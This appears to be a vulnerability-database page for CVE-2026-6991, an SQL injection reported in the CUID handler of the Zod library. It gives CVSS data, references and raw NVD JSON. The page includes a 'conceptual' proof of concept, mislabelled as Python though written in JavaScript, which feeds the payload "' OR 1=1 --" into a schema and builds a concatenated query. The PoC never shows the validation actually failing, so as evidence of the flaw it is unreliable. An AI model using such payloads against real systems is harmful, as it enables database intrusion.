CVE-2026-6991

Description

A vulnerability was determined in colinhacks Zod up to 4.3.6. The impacted element is an unknown function of the file packages/zod/src/v4/core/regexes.ts of the component CUID Data Type Handler. Executing a manipulation can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

colinhacks Zod <= 4.3.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Conceptual Proof of Concept for CVE-2026-6991
// Demonstrates SQL Injection via vulnerable CUID handler in Zod <= 4.3.6

const { z } = require('zod');

// Vulnerable Schema Definition
// The vulnerability resides in the CUID validation logic
const vulnerableSchema = z.object({
  id: z.cuid()
});

// Malicious payload designed to exploit the regex manipulation
// This payload attempts to bypass CUID validation to inject SQL
const payload = "' OR 1=1 --";

console.log("[+] Testing payload: " + payload);

try {
  // In vulnerable versions, this validation passes unexpectedly
  const validatedData = vulnerableSchema.parse({ id: payload });
  console.log("[!] Validation Bypassed! Input accepted: " + validatedData.id);

  // Simulating backend SQL construction using the 'validated' input
  // If the backend uses string concatenation, SQL Injection occurs
  const userId = validatedData.id;
  const query = `SELECT * FROM users WHERE id = '${userId}'`;
  
  console.log("[+] Executing Query: " + query);
  // Result: SELECT * FROM users WHERE id = '' OR 1=1 --'
  
} catch (error) {
  console.log("[-] Validation failed. Payload rejected.");
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6991
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6991
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6991/
[4] VulDB https://vuldb.com/cve/CVE-2026-6991
[5] https://vuldb.com/submit/796749
[6] https://vuldb.com/vuln/359543
[7] https://vuldb.com/vuln/359543/cti
[8] https://vuldb.com/submit/796749

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6991", "sourceIdentifier": "[email protected]", "published": "2026-04-25T18:16:19.240", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in colinhacks Zod up to 4.3.6. The impacted element is an unknown function of the file packages/zod/src/v4/core/regexes.ts of the component CUID Data Type Handler. Executing a manipulation can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://vuldb.com/submit/796749", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359543", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359543/cti", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/796749", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}